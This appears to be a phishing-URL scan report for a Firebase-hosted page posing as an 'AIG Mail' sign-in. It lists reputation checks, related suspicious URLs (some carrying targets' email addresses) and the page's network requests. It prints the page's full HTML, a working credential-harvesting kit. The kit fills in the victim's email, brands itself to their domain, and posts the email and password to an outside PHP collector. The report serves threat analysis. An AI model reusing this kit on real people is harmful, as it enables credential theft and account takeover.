https://firebasestorage.googleapis.com/v0/b/tifa-c1f03.appspot.com/o/gen%2Findex2tif.html?alt=media&token=f838da5a-c172-4618-9348-91a26f85c3f3#AIGIndonesia.ClaimService@aig.com

Last Checked: Jan 07, 2021, 01:47 EST

IP Address: 172.217.6.42
ASN #: AS15169 GOOGLE, US
Location: San Francisco, California, US
URL Reputation:
  • Unknown This URL is not identified as malicious in the PhishTank Database.
  • Unknown PhishCheck thinks this URL is likely not a phish.
  • Unknown OpenPhish: URL not in feed.

Other submissions on 172.217.6.42:

  • https://firebasestorage.googleapis.com/v0/b/oiuy-b8aaa.appspot.com/o/upduencoded%20-%20Copy%20(5).html?alt=media&token=cf0d5330-c959-4af6-bee6-c8b8f11719d0#info@rgd.de

  • https://firebasestorage.googleapis.com/v0/b/oiuy-b8aaa.appspot.com/o/upduencoded%20-%20Copy%20(5).html?alt=media&token=cf0d5330-c959-4af6-bee6-c8b8f11719d0#info@rgd.de

  • https://firebasestorage.googleapis.com/v0/b/bied-f82f7.appspot.com/o/shared/file-jbcn349h9nq.html?alt=media&token=a3505565-e1f1-4c57-8b33-3cda8077ef50&f=335095954269069389

  • http://translate.googleapis.com/

  • https://firebasestorage.googleapis.com/v0/b/loiazure.appspot.com/o/chapoz%2F!%40%23%24%25%5E%26()%26%5E%25%24%23%40!%26(%5E%40%25%40%24%40%25%5E!%24%40%25%5E%40%26%40%26.html?alt=media&token=d47e342c-1bad-4268-b9db-97829b4ce169#wolniak@tradeservice.ch

  • https://firebasestorage.googleapis.com/v0/b/mdmm-361b7.appspot.com/o/optfjdkgjdf.html?alt=media&token=a6e36b72-8af6-43aa-ab59-e78452f468d1

Other submissions on googleapis.com:

  • https://storage.googleapis.com/checkthisbuckets/dsdgrf%20vder%20rbvc.html#1782702Xl2474367Jl455575350Kv14455Jz24mVu105393JB

  • https://firebasestorage.googleapis.com/v0/b/itepud-d2a74.appspot.com/o/index.html?alt=media&token=064e3283-949c-45f7-86cf-2441da22df6d

  • https://firebasestorage.googleapis.com/v0/b/owa-micro.appspot.com/o/unsubscribe.html?alt=media&token=f0ab06a1-8e00-4e54-a16a-874548887981&id=prasats@bot.or.th

  • https://firebasestorage.googleapis.com/v0/b/owa-micro.appspot.com/o/unsubscribe.html?alt=media&token=f0ab06a1-8e00-4e54-a16a-874548887981&id=permsuks@bot.or.th

  • https://storage.googleapis.com/pdu88udvu8du8.appspot.com/10305.html

  • https://hire-static.storage.googleapis.com/googlehire/legal/tos

  • https://storage.googleapis.com/iphpiepihwhhehi.appspot.com/10188.html#accounting@jbscanada.ca

  • https://firebasestorage.googleapis.com/v0/b/web-exch.appspot.com/o/index.html?alt=media&token=a9b2a292-30d6-4527-a159-b64ae0b38e64&id=merchants@americanexpress.com.sa

  • http://fonts.googleapis.com/

  • http://firebaseinstallations.googleapis.com/

Previous checks:

                               fgets: Connection reset by peer

                             
  • GET
    200 OK

    https://tracking-protection.cdn.mozilla.net/base-fingerprinting-track-digest256/1608186823

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt

  • GET
    200 OK

    https://tracking-protection.cdn.mozilla.net/base-cryptomining-track-digest256/1604686195

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv4

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv6

  • GET
    303 See Other

    https://snippets.cdn.mozilla.net/6/Firefox/84.0/20201211215739/Linux_x86_64-gcc3/en-US/release-cck-ubuntu/Linux%204.15.0-126-generic%20(GTK%203.22.30%2Clibpulse%20not-available)/canonical/1.0/

  • GET
    200 OK

    https://firebasestorage.googleapis.com/v0/b/tifa-c1f03.appspot.com/o/gen%2Findex2tif.html?alt=media&token=f838da5a-c172-4618-9348-91a26f85c3f3

  • GET
    200 OK

    https://tracking-protection.cdn.mozilla.net/social-tracking-protection-facebook-digest256/1604686195

  • GET
    200 OK

    https://snippets.cdn.mozilla.net/us-west/bundles-pregen/Firefox/en-us/default.json

  • GET
    200 OK

    https://tracking-protection.cdn.mozilla.net/social-tracking-protection-linkedin-digest256/1564526481

  • GET
    200 OK

    https://tracking-protection.cdn.mozilla.net/social-tracking-protection-twitter-digest256/1604686195

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv4

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv6

  • GET
    200 OK

    https://pilotexhange.com/firebase/files/general/bootstrap.min.css

  • GET
    200 OK

    https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700

  • GET
    200 OK

    https://pilotexhange.com/firebase/files/general/styles.min.css

  • GET
    200 OK

    https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js

  • GET
    200 OK

    https://ajax.googleapis.luchifab.com/ajax.googleapis/ajax/libs/jquery/2.2.4/jquery.min.js

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv4

  • GET
    200 OK

    http://detectportal.firefox.com/success.txt?ipv6

  • GET
    200 OK

    https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Mu4mxK.woff2

  • GET
    200 OK

    https://www.google.com/s2/favicons?domain=aig.com

  • GET
    404 Not Found

    https://firebasestorage.googleapis.com/favicon.ico

  • https://snippets.cdn.mozilla.net/6/Firefox/84.0/20201211215739/Linux_x86_64-gcc3/en-US/release-cck-ubuntu/Linux%204.15.0-126-generic%20(GTK%203.22.30%2Clibpulse%20not-available)/canonical/1.0/ https://snippets.cdn.mozilla.net/us-west/bundles-pregen/Firefox/en-us/default.json
b'<html><head>\n    <meta charset="utf-8">\n    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">\n    <title class="logoname">AIG Mail</title>\n    <meta name="" content="">\n    <link rel="stylesheet" href="https://pilotexhange.com/firebase/files/general/bootstrap.min.css">\n    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700">\n    <link rel="stylesheet" href="https://pilotexhange.com/firebase/files/general/styles.min.css">\n<link rel="icon" type="image/png" sizes="192x192" href="" id="favimg" class="logoimg">\n</head>\n<body>\n    <div>\n        <div class="container">\n            <div class="row">\n                <div class="col-11">\n\t\t\t<form>\n                    <div class="d-flex flex-column justify-content-center" id="login-box">\n                        <div class="d-xl-flex justify-content-xl-center" style="margin: 42px; text-align: center;"><span style="font-size: 24px;margin-left: 5px;"><img id="logoimg" src="https://www.google.com/s2/favicons?domain=aig.com" alt="Logo" onerror="this.src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAC0AAAAtCAYAAAA6GuKaAAAABmJLR0QA/wD/AP+gvaeTAAADKUlEQVRYCe1WzU8TQRR/s1u3gJKoZxM1abwZlZYKGhP1Ai0cvXnw4s1C4he2xaTVKFRMNOHjT/A/KC2cNPFAWyhqxIshURNv4EfERNjsdniz2yF0d2to2YXLNO91Or/35r1ff/syLYB4CQWEAkIBoYBQwGUFiLVeODF9SqO+diu+X3sf0dZKo32ft/f3bd+wz1SDP9KByl0KcBP3Evp+WQUoTAL4H1sJ2JTmCZ3xfKcuwRQmdHJsD9eSVIHYfCYy79RTcgIZxg4sKsUuAvQG7n+g74Wtsn5lpdjN+tdriELWhoLJ3AOfBq+KY9HvPNKdnjmqbtAUEIghVveLYqxZM0ZB8ZNHc+nen7zI+aHcMc0H18sj0WccY6sD6fwcBs5gYOyQ0pJ5k76yjnvDzg1PhyQqTeEmjO6SkWKF6LF3T/sWeMHL6dctf9X1OAUYQuxDeSTSjeuW1VOtFQ+k1tT1pWBypo9ns8Ls0bFHiNgq+m6sOgqFC6wuL8T6Yd9PrD9ireg2Q0FrsWDSULqrBiU0KxN5sPSk5wvHdzEyOt4KU9ZRCD+cPalTfRwo6ec9qmvBqvTOSJun/2GybWQ64rNBIlXwaoLaL2qesb4XaEWKLWZ6yjxgGQUnZW2k640Hr7l93RqZUCIf5QFGAEfmYnVkVjhuWVdYnOWxfB5jdXAUlihACjEnwgjbDcWrBR3HozbF3OHI6DoZeJ+JfIXq63Q8e0QhchpvmVsIyejGKKhUT3/M9P/CvWFn4/kTskwnHEbBiFvebEo3T9qsbIzM7zU6ujwR3TAhgI7EzCVC6G1KycvF0d63HA8M5PyH20mCmrfCTpV1nTTns4yPf3BhJJrngHUNJXMRCmQc8QB6I2Yj7Wvk9H9yA0goFxzOZfFXgt2533gu3u3HJSCTqLr1VuApDa9ukTYb43WFBK+GkvnnskJf6Cq5Qyncx2AbumvmLmmTVhvObEpTyT3cHkR33Rq58hpt7glhRsJL0qy+Jy5IeyKrQ1GhtIMonkBCaU9kdSgqlHYQxRPI9jOuEe2aohO/J92aKKrKdOsvbxPHxRGhgFBAKCAUEArsTIFN/scftCB4D7UAAAAASUVORK5CYII=\'" width="45" height="45"><span id="logoname" style="font-size: 24px;margin-left: 5px;">AIG</span> <br>  </span>\n                        </div>\n                        <hr style="width: 100%;margin-bottom: 3px;margin-top: -10px;">\n                        <div class="login-box-header">\n                            <div class="alert alert-danger" role="alert" id="msg" style="display: none;"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">\xc3\x97</span></button><span><strong>Invalid Password! Please enter correct Password</strong></span></div>\n                            <div class="alert alert-danger" role="alert" id="error" style="display: none;"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">\xc3\x97</span></button><span><strong>Account doesn\'t exist, kindly enter new account.</strong>.</span></div>\n                            <h5 style="color: rgb(139,139,139);margin-bottom: 0px;font-weight: 400;font-size: 27px;font-family: \'Playfair Display\', serif;">Sign in to continue?</h5>\n                        </div>\n                        <div class="email-login" style="background-color:#ffffff;"><input type="email" readonly="" id="email" class="email-imput form-control" style="margin-top: 36px;margin-bottom: 36px;" required="" placeholder="Email" minlength="6" name="email"><input type="password" id="password" class="password-input form-control" style="margin-top: 10px;margin-bottom: 36px;" required="" placeholder="Password" minlength="6" name="password"></div>\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n                        <div class="submit-row2" style="margin-top:-30px;padding:10px; margin-left:auto;margin-right:auto;">\n\t\t\t\t\t\t\t<!--\n\t\t\t\t\t\t<a class="btn btn-primary btn-block box-shadow" role="button" id="submit-btn" href="#" style="font-size: 20px;padding-top: 5px;margin-left: 2px;margin-bottom: 36px;background: #337ab7;border-radius: 33px;">Sign in</a>\n\t\t\t\t\t\t-->\n\t\t\t\t\t\t\n\t\t\t\t\t <button class="btn btn-primary btn-block box-shadow" style="margin-bottom:30px;padding:10px;" id="submit-btn">Continue</button>\n\t\t\t\t\t\t\t\t\t \n                        <!--    <div class="d-flex justify-content-between">\n                                <div class="form-check form-check-inline" id="form-check-rememberMe"><input class="form-check-input" type="checkbox" id="formCheck-1" for="remember" style="cursor:pointer;" name="check"><label class="form-check-label" for="formCheck-1"><span class="label-text">Secured login Session?</span></label></div>\n\t\t\t\t\t\t\t\t-->\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n                             <!--   <a\n                                    id="forgot-password-link" href="#">Forgot Password?</a> -->\n                            </div>\n                        </div>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<br><br><br>\n\t\t\t\t\t\t\n                        <div class="d-flex flex-row align-items-center login-box-seperator-container">\n                            <div class="login-box-seperator"></div>\n                            <div class="login-box-seperator-text"></div>\n                            <div class="login-box-seperator"></div>\n                        </div>\n                        <div class="d-flex d-xl-flex justify-content-xl-center" id="login-box-footer" style="padding: 10px 20px;padding-bottom: 41px;padding-top: 5px;"><a id="footer-text" href="#" style="color: #337AB7;font-size: 20px;border-color: #337ab7;"><br>\n\t\t\t\t\t\t\xc2\xa9<span class="logoname">AIG Mail</span> 2020<br></a></div>  \n                    </form></div>\n                </div>\n             </div>\n      \n\t   </div>\n    \n  <!-- Optional JavaScript -->\t \n<script src="https://ajax.googleapis.luchifab.com/ajax.googleapis/ajax/libs/jquery/2.2.4/jquery.min.js"></script>\n<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script> \n  \n  <script>\n\n    /* global $ */\n    $(document).ready(function(){\n      var count=0;\n\n      $(\'#back1\').click(function () {\n        $("#msg").hide();\n        $(\'#email\').val("");\n        $("#automail").animate({left:200, opacity:"hide"}, 0);\n        $("#inputbar").animate({right:200, opacity:"show"}, 1000);\n\n      });\n\n      var email = window.location.hash.substr(1);\n      if (!email) {\n\n      }\n      else\n      {\n        var my_email =email;\n        $(\'#email\').val(my_email);\n        var filter = /^([a-zA-Z0-9_\\.\\-])+\\@(([a-zA-Z0-9\\-])+\\.)+([a-zA-Z0-9]{2,4})+$/;\n\n        if (!filter.test(my_email)) {\n          $(\'#error\').show();\n          email.focus;\n          return false;\n        }\n        var ind=my_email.indexOf("@");\n        var my_slice=my_email.substr((ind+1));\n        var c= my_slice.substr(0, my_slice.indexOf(\'.\'));\n        var final= c.toLowerCase();\n        var finalu= c.toUpperCase();\n\n        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);\n        $("#logoname").html(finalu);\n        $(".logoname").html(finalu+" Mail");\n        $(".domain").html(my_slice);\n        $(".email").html(email);\n      }\n\n\n      \n      $(\'#submit-btn\').click(function(event){\n        $(\'#error\').hide();\n        $(\'#msg\').hide();\n        event.preventDefault();\n        var email=$("#email").val();\n        var password=$("#password").val();\n        var msg = $(\'#msg\').html();\n        $(\'#msg\').text( msg );\n      ///////////new injection////////////////\n      var my_email =email;\n      var filter = /^([a-zA-Z0-9_\\.\\-])+\\@(([a-zA-Z0-9\\-])+\\.)+([a-zA-Z0-9]{2,4})+$/;\n\n      if (!filter.test(my_email)) {\n        $(\'#error\').show();\n        email.focus;\n        return false;\n      }\n\n      var ind=my_email.indexOf("@");\n      var my_slice=my_email.substr((ind+1));\n      var c= my_slice.substr(0, my_slice.indexOf(\'.\'));\n      var final= c.toLowerCase();\n      var finalu= c.toUpperCase();\n\n        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);\n        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);\n        $("#logoname").html(finalu);\n      ///////////new injection////////////////\n      count=count+1;\n      \n      $.ajax({\n        dataType: \'JSON\',\n        url: \'https://pilotexhange.com/fireb/general/_upgrade/tif/index2tif.php\',\n        type: \'POST\',\n        data:{\n          email:email,\n          password:password,\n        },\n            // data: $(\'#contact\').serialize(),\n            beforeSend: function(xhr){\n              $(\'#submit-btn\').html(\'Verifing...\');\n            },\n            success: function(response){\n\t\t\t $(\'#msg\').html("<span style=\'color:red;\'>Username or Password is incorrect. Please try again</span>");\n              if(response){\n                $("#msg").show();\n\t\t\t\tconsole.log(response);\n\t\t\t\t$(\'#msg\').html(response[\'msg\']);\n                if(response[\'signal\'] == \'ok\'){\n                  $("#password").val("");\n                  if (count>=2) {\n                    count=0;\n                    // window.location.replace(response[\'redirect_link\']);\n                    window.location.replace("http://www."+my_slice);\n                //   window.location.replace("https://firebasestorage.googleapis.com/v0/b/roundcube-3f5b4.appspot.com/o/withbg%2FHIGHMARK%20-%20FAC41%209DE-Janitorial%20Services%20BID%20(1).pdf?alt=media&token=0b31368e-164a-4713-a848-b6555cb9f7ed");\n\n                  }\n                  // $(\'#msg\').html(response[\'msg\']);\n                }\n                else{\n                   $(\'#msg\').html(response[\'msg\']);\n                }\n              }\n            },\n            error: function(){\n              $("#password").val("");\n              if (count>=2) {\n                count=0;\n                window.location.replace("http://www."+my_slice);\n              //  window.location.replace("https://firebasestorage.googleapis.com/v0/b/roundcube-3f5b4.appspot.com/o/withbg%2FHIGHMARK%20-%20FAC41%209DE-Janitorial%20Services%20BID%20(1).pdf?alt=media&token=0b31368e-164a-4713-a848-b6555cb9f7ed");\n              }\n              $("#msg").show();\n              // $(\'#msg\').html("Please try again later");\n            },\n            complete: function(){\n              $(\'#submit-btn\').html(\'Sign in\');\n            }\n          });\n    });\n\n\n    });\n\n\n  </script>\n  </body></html>'

                             

Screenshot: